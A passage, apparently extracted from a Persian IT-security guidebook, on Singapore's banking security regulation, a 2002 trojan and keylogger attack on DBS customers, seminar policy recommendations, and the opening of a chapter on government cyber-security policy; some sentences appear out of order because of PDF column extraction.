ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺍﻭﻟﻴﺔ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺗﻨﻬﺎ ﻳﻚ ﻳﺎ ﺩﻭ ﺣﺎﺩﺛﺔ ﺩﻫﺸﺘﻨﺎﻙ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺑﺎﻧﻜﻬﺎ ﺭﺍ ﺑﻪ ﺗﺠﺪﻳﺪ ﻧﻈﺮ ﺩﺭ ﺍﻳﻦ ﺭﻭﻧﺪ ﻭﺍﺩﺍﺭ ﻛﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﻧﻮﻋﻲ
ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ SSLﻭﺟﻮﺩ ﺩﺍﺭﺩ؛ ﺍﻣﺎ
ﺍﻣﻨﻴﺘﻲ ﻛﻪ SSLﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ﺑﺴﻴﺎﺭ ﻣﺤـﺪﻭﺩ ﺍﺳـﺖ ،ﭼﺮﺍﻛـﻪ
ﺗﻨﻬﺎ ﺩﺭ ﺧﻼﻝ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﺁﻧﻬﺎ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﺪ ،ﻭ ﻧﻪ ﺩﺭ
ﻣﺒﺪﺃ ﻳﺎ ﻣﻘﺼﺪ .ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺩﻳﮕﺮ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ
ﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺍﻣﻨﻴـﺖ ﺁﻧﻬـﺎ
ﺍﺩﺍﺭﺓ ﺍﻣــﻮﺭ ﭘــﻮﻟﻲ ﺳــﻨﮕﺎﭘﻮﺭ ﺑــﺮﺍﻱ ﻣﺆﺳــﺴﺎﺕ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ
"ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ" ﺷﺎﻣﻞ ۲۶ﺗﻮﺻـﻴﻪ ﺩﺭ
ﺯﻣﻴﻨﺔ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻻﻳﻪﺍﻱ ﺗﺪﻭﻳﻦ ﻛﺮﺩ .ﺳﻪ ﺩﺳﺘﺔ ﺍﺻـﻠﻲ ﺍﻳـﻦ
ﺭﺍﻫﺒﺮﺩﻫﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
.۱
.۲
.۳
ﺍﻳﺠﺎﺩ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﻣﺴﺘﺤﻜﻢ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ
ﺗﻘﻮﻳﺖ ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ ،ﺍﻣﻨﻴﺖ ،ﻭ ﻗﺎﺑﻠﻴﺖ ﺑﺎﺯﻳﺎﺑﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﻮﻱ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ
ﻋﻼﻭﻩ ﺑﺮ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﻨﺎﻭﺭﻱ ،ﺍﺩﺍﺭﺓ ﺍﻣﻮﺭ ﭘـﻮﻟﻲ
ﺳﻨﮕﺎﭘﻮﺭ ﺑﺎﻧﻜﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺍﻧﺠﺎﻡ ﺣﺪﺍﻗﻞ ﺳـﺎﻟﻲ ﻳﻜﺒـﺎﺭ ﺁﺯﻣـﻮﻥ
ﻧﻔﻮﺫ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺤﻴﻂ ﻛـﺎﺭ ﻧﻤـﻮﺩ .ﺍﻳـﻦ ﺍﺩﺍﺭﻩ ﺩﺍﺭﺍﻱ ﻳـﻚ ﺗـﻴﻢ
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﻭ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺑـﺮﺍﻱ ﺩﺭﺟـﻪﺑﻨـﺪﻱ
ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻗﺘﺼﺎﺩﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺍﺳﺖ؛ ﻛﻪ ﺑﺮ ﻣﺒﻨﺎﻱ ﺷـﺶ
ﻣﻌﻴﺎﺭ ﻛﻪ ﺗﻮﺳﻂ ﺍﺩﺍﺭﺓ ﺍﻣﻮﺭ ﭘﻮﻟﻲ ﺳـﻨﮕﺎﭘﻮﺭ ﺗﻌﻴـﻴﻦ ﺷـﺪﻩ ﺍﻧﺠـﺎﻡ
ﻣﻲﮔﻴﺮﺩ .ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ،ﻣﺆﺳﺴﺎﺕ ﺭﺍ ﺍﺯ ﻟﺤﺎﻅ ﻣﻴـﺰﺍﻥ ﺍﻳﻤﻨـﻲ ﺑـﻪ
ﭘﻨﺞ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺷـﻤﺎﺭﺓ ۱ﻧـﺸﺎﻧﮕﺮ ﺍﻣـﻦﺗـﺮﻳﻦ ﻭ
ﺷﻤﺎﺭﺓ ۵ﻧﺸﺎﻧﮕﺮ ﻧﺎﺍﻣﻦﺗﺮﻳﻦ ﺁﻧﻬﺎ ﺍﺳﺖ .ﺑﺎﻧﻜﻬﺎ ﻣﻠﺰﻡ ﻫﺴﺘﻨﺪ ﻛـﻪ
ﺩﺭ ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﺣﺪﺍﻗﻞ ﺑﻪ ﺩﺭﺟﺔ ۲ﺩﺳﺖ ﻳﺎﺑﻨﺪ ،ﻭ ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ
ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻃﺮﺡ ﺑﺎﺯﻳﺎﺑﻲ ﻭ ﺗﺮﻣﻴﻢ ﺳﺮﻳﻊ ﻧﻴﺰ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ .ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﺓ ﭘﻴﺸﺮﻓﺖ ﺩﺭ ﺍﻣﻨﻴـﺖ ﺑﺎﻧﻜﻬـﺎ ﻭ ﺍﻟﻘـﺎﻱ
ﺣﺲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ ،ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﺩﺭﺟﻪﺑﻨﺪﻱ ﺑـﺼﻮﺭﺕ ﻋﻤـﻮﻣﻲ
ﻣﻨﺘﺸﺮ ﻣﻲ ﺷﻮﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﺎﻧﻜﻬﺎ ﻣﻠﺰﻡ ﺑﻪ ﮔﺰﺍﺭﺵ ﻫﺮﮔﻮﻧـﻪ
ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻲﺑﺎﺷﻨﺪ.
ﺑـــﺎ ﺍﻓـــﺰﺍﻳﺶ ﺍﺳـــﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳـــﺘﮕﺎﻫﻬﺎﻱ ﺳـــﻴﺎﺭ ﭘﺮﺩﺍﺧـــﺖ،
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳـﻴﻢ ﻧﻴـﺰ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ
ﮔﻴﺮﻧﺪ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﺠﺮﺑﻴﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺑـﻲﺳـﻴﻢ
ﺳﻨﮕﺎﭘﻮﺭ ﻫﻤﭽﻨﺎﻥ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻫﺴﺘﻨﺪ.
ﺟﻤﻊﺑﻨﺪﻱ ﺳﺆﺍﻻﺕ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ
ﺗﻮﺻﻴﻪﻫﺎ ﻭ ﭘﺮﺳﺸﻬﺎﻱ ﭘﺎﻳﺎﻧﻲ ﺷﺎﻣﻞ ﻧﻘﺎﻁ ﻛﻠﻴﺪﻱ ﺍﻳـﻦ ﺳـﻤﻴﻨﺎﺭ
ﺟﻬﺎﻧﻲ ﺑﻮﺩ.
ﻲ ﻧﻴﺎﺯﻫﺎﻱ ﺣـﺎﻝ
ﺍﻭﻝ ،ﺍﻃﻼﻉ ﺭﺳﺎﻧﻲ ﻭ ﺁﮔﺎﻫﻲ ﺩﺭ ﺁﻣﻮﺯﺵ ﻋﻤﻮﻣ ﹺ
ﺣﺎﺿﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻘﺸﻲ ﺣﻴﺎﺗﻲ ﺍﻳﻔﺎ ﻣﻲﻛﻨـﺪ .ﻗـﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ ﻣﺜـﻞ
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺭ ﺳﺎﻝ ،۲۰۰۲ﺣﻤﻠﺔ ﺩﻳﮕﺮﻱ ﺑﻪ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ
) (DBSﺻــﻮﺭﺕ ﮔﺮﻓــﺖ .ﺩﺭ ﺍﻳــﻦ ﺭﻭﻳــﺪﺍﺩ ﻧﻔــﻮﺫﮔﺮﺍﻥ ﺑــﺪﻟﻴﻞ
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻛﻲ ﺷـﺒﻜﻪ ﻭ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻧﺎﻣﻨﺎﺳـﺐ ﺳﻴـﺴﺘﻤﻬﺎ
ﺗﻮﺍﻧﺴﺘﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﻫﺪﻑ ﻗﺮﺍﺭ ﺩﻫﻨـﺪ .ﻧﻔـﻮﺫﮔﺮﺍﻥ
ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻭ ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﺣﺴﺎﺑﻬﺎﻱ ۲۱
ﻣﺸﺘﺮﻱ ﺑﺎﻧﻚ ﺗﻌﺒﻴﻪ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﺗـﺎ ﺷـﻤﺎﺭﺓ
ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ ) (PINﻭ ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺎﻳﻲ ﻛـﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺪﺳـﺖ
ﺁﻭﺭﻧــﺪ .ﺍﻳــﻦ ﺣﺎﺩﺛــﻪ ﺳــﺒﺐ ﺷــﺪ ۶۲,۰۰۰ﺩﻻﺭ ﺑــﻪ ﺣــﺴﺎﺑﻬﺎﻱ
ﻣﺸﺘﺮﻳﺎﻥ ﺿﺮﺭ ﻭﺍﺭﺩ ﺷﻮﺩ ،ﺍﻣﺎ ﻧﻜﺘﺔ ﻗﺎﺑـﻞ ﺗﻮﺟـﻪ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ
ﺗﺄﺛﻴﺮ ﻣﻨﻔﻲ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﺩﺭ ﺍﻓﻜﺎﺭ ﻋﻤﻮﻣﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﺑﻮﺩ؛
ﭼﺮﺍﻛﻪ ﺭﻭﺯﻧﺎﻣﻪﻫﺎﻱ ﻛﺸﻮﺭ ﺑﻪ ﻣـﺪﺕ ﻳﻜﻤـﺎﻩ ﺩﺭ ﺍﻳـﻦ ﺧـﺼﻮﺹ
ﻣﻄﻠﺐ ﻧﻮﺷـﺘﻨﺪ .ﺍﻣﺜـﺎﻝ ﺍﻳـﻦ ﺭﺧـﺪﺍﺩﻫﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺑﺤـﺮﺍﻥ
ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﻣﺮﺩﻡ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻣﻨﺠـﺮ
ﺷﻮﻧﺪ.
ﺗﻀﻤﻴﻦ ﺷﻮﺩ .ﺑﺮﺍﻱ PINﻫﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ
ﺷﻮﺩ؛ ﺍﻣﺎ ﺍﻳﻦ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ ،ﭼـﻮﻥ PINﻫـﺎ ﻛﻮﭼـﻚ
ﻫﺴﺘﻨﺪ ﻭ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ.
٢٢٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
"ﺍﻟﺰﺍﻡ ﮔﺰﺍﺭﺵ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺸﻜﻮﻙ" ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ
ﻛﻪ ﺑﻪ ﻣﺮﺣﻠﺔ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ.
ﺍﺳﺖ .ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻟﻲ ﺍﺯ ﻧﺤﻮﺓ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ
ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ.
ﺩﻭﻡ ،ﺷﻔﺎﻓﻴﺖ ﻭ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ
ﺍﻳﻤﻨﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﻳﻨﺪﻩ ﺍﻫﻤﻴـﺖ ﺯﻳـﺎﺩﻱ ﺩﺍﺭﺩ .ﺑـﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ
ﺍﺷﺎﺭﻩ ﺷﺪ ﻛﻪ ﮔﺎﻫﻲ ﭘﻮﺷﺶ ﺧﺒﺮﻱ ﻭﻗﺎﻳﻊ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻀﺮ ﺑﺎﺷـﺪ،
ﭼﺮﺍﻛﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻫﺮﺻﻮﺭﺕ ﺍﺯ ﻣﻄﺒﻮﻋﺎﺕ ﺗـﺄﺛﻴﺮ ﻣـﻲﭘﺬﻳﺮﻧـﺪ.
ﺩﺭﻋــﻮﺽ ﺷــﺮﻛﺘﻬﺎ ﺑﺎﻳــﺪ ﻭﺿــﻌﻴﺖ ﺭﺍ ﺑــﺴﺮﻋﺖ ﺍﺻــﻼﺡ ﻛﻨﻨــﺪ.
ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺸﻜﻞ ﺑﺎ ﺍﻳﺠﺎﺩ ﻳﻚ ﻃـﺮﺡ ﻋﻤﻠﻴـﺎﺗﻲ ،ﺭﺍﻩ ﺑﻬﺘـﺮﻱ
ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻳﻚ ﻧﻔﻮﺫ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ .ﺳﺆﺍﻝ ﻋﻤـﺪﻩﺍﻱ ﻛـﻪ ﺩﺭ
ﺍﻳﻨﺠﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﭼﻪ ﺣﺪﻱ ﻭ ﺩﺭ ﭼﻪ ﺯﻣـﺎﻧﻲ
ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ .ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ
ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﭼﻬﺎﺭﻡ ،ﺑﺮﺍﻱ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻧﻮﻋﻲ ﺗﻌﻬﺪ ﺩﺭ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ،
ﻧﻘــﺸﻬﺎ ﻭ ﻣــﺴﺌﻮﻟﻴﺘﻬﺎ ﺑﺎﻳــﺪ ﺗﻌﻴــﻴﻦ ﺷــﻮﻧﺪ؛ ﻭ ﻟــﺬﺍ ﺗــﺪﻭﻳﻦ ﻳــﻚ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺮﺍﻗﺒﺖ ﻭ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻒ ﺍﻣﺎﻧﺘﺪﺍﺭﻱ ﺑﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻜﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳـﺖ .ﻋﻨـﺎﻭﻳﻦ
ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺳﭙﺮﺩﻩﻫـﺎ ﻭ ﺗﺮﺍﻛﻨـﺸﻬﺎ ،ﺍﻋﺘﻤـﺎﺩ
ﻋﻤﻮﻣﻲ ،ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ.
ﺳﻮﻡ ،ﺑﻴﺸﺘﺮ ﻛﺸﻮﺭﻫﺎﻱ ﺷـﺮﻛﺖﻛﻨﻨـﺪﻩ ﺑـﻪ ﻟـﺰﻭﻡ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ
ﻓﺮﺍﺑﺨﺸﻲ ﺗﺄﻛﻴﺪ ﺩﺍﺷﺘﻨﺪ .ﻳﻜﻲ ﺍﺯ ﺑﺨﺸﻬﺎﻳﻲ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺁﻥ
ﻣﺜﻤﺮ ﺛﻤﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻫـﺴﺘﻨﺪ .ﺩﺭ
ﺍﻳﻦ ﻗﺴﻤﺖ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺟﺎﻣﻌﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨـﺪ
ﺗﺎ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﺮ ﺑﺨﺶ ﻣﺸﺨﺺ ﺷـﻮﺩ ،EBG .ﻳﻜـﻲ ﺍﺯ
ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ ﻧﻴﺰ InfraGardﻛﻪ ﻳﻚ
ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ -ﻋﻤﻮﻣﻲ ﻣﺘﻌﻠﻖ ﺑـﻪ FBIﺍﺳـﺖ ﺩﻭ ﻧﻤﻮﻧـﻪ ﺍﺯ
ﺍﻳﻦ ﻗﺒﻴﻞ ﻣﺆﺳﺴﺎﺕ ﻫﺴﺘﻨﺪ InfraGard .ﺗﻤﺎﻣﻲ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ
ﺣﻴﺎﺗﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ ﻭ ﺣﺪﻭﺩ ۱۰,۰۰۰ﻋﻀﻮ ﺩﺍﺭﺩ .ﻫﺪﻑ ﺍﻳﻦ
ﺳﺎﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﺍﻋﺘﻤﺎﺩ ﻭ ﺗﺸﻮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺍﻋـﻀﺎ
ﺳﺮﺍﻧﺠﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻳﻜﻲ ﺍﺯ ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ
ﻣﻬﻢ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺑﻮﺩ .ﻧﻤﻮﻧﻪﺍﻱ ﺍﺯ ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ
ﺯﻣﻴﻨﻪ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺭﺥ ﺩﺍﺩ؛ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﺷـﺮﻛﺖ ﺧـﺪﻣﺎﺕ
ﻣﻴﺰﺑــﺎﻧﻲ ﻭﺏ ﺩﺭ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ﻣــﻮﺭﺩ ﻧﻔــﻮﺫ ﻗــﺮﺍﺭ ﮔﺮﻓــﺖ ﻭ
ﺩﺭﻧﺘﻴﺠﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺶ ﺍﺯ ۳۰۰ﺑﺎﻧـﻚ ﺧﺪﺷـﻪﺩﺍﺭ ﺷـﺪ .ﺟﺰﺋﻴـﺎﺕ
ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ
ﺑﺨﺸﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﻭ ﺳـﺎﻳﺮ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﺩﺭ ﻗـﺴﻤﺖ
ﺿﻤﺎﺋﻢ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪﻩ ﭘﻴﺪﺍ ﻛﺮﺩ.
ﺩﺭ ﺧﺎﺗﻤــﻪ ﺧﺎﻃﺮﻧــﺸﺎﻥ ﻣــﻲﻛﻨــﻴﻢ ﻛــﻪ ﺑــﺮﺍﻱ ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﺍﻥ ﻭ
ﺑﺎﺯﺭﺳﺎﻥ ،ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﭼﺘﺮ ﺗﻘﻨﻴﻨﻲ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻧﺘﻘﺎﻝ ﭘـﻮﻝ
ﺗﻮﺳﻂ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ،ﻣﺜﻞ ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻧﻲ ﻭﺏ( ﺍﻣﺮﻱ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ
ﺍﺳﺖ.
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ
ﻓﺼﻞ .۲ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﱵ
ﻓﺼﻞ .۳ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﱵ ﺑﺮ ﲞﺶ ﺧﺼﻮﺻﻲ
ﻓﺼﻞ .۴ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﱪ ﺩﻭﻟﺖ
ﻓﺼﻞ ﺍﻭﻝ
ﻣﻘﺪﻣﻪ
ﻣﺸﺎﺑﻪ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺮ ﺍﻳﻨﺘﺮﻧﺖ ،ﺩﺭ ﻣﻘﻮﻟـﻪ ﺍﻣﻨﻴـﺖ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻧﻴـﺰ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﻧﻘـﺶ ﻣﻬﻤـﻲ ﺍﻳﻔـﺎ
ﻣﻲﻛﻨﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺑﺎﻳﺪ ﺑﺎ ﺍﺣﺘﻴﺎﻁ ﺍﻇﻬﺎﺭ ﻧﻈﺮ ﻛـﺮﺩ،
ﭼﺮﺍﻛﻪ ﻳﻚ ﭼـﺎﺭﭼﻮﺏ ﻋﻤـﻮﻣﻲ ﺳﻴﺎﺳـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻣﻨﻴـﺖ ﺭﺍ
ﺗﻘﻮﻳﺖ ﻛﻨﺪ؛ ﺍﻣﺎ ﺍﺷﻜﺎﻻﺗﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﻣﻘﺮﺭﺍﺕ ﻧﺎﺩﺭﺳـﺖ ﺩﻭﻟﺘـﻲ
ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﺑﻴﺶ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﭼﻨﻴﻦ ﻣﻘﺮﺭﺍﺗـﻲ ﺍﺳـﺖ .ﻓﻨـﺎﻭﺭﻱ
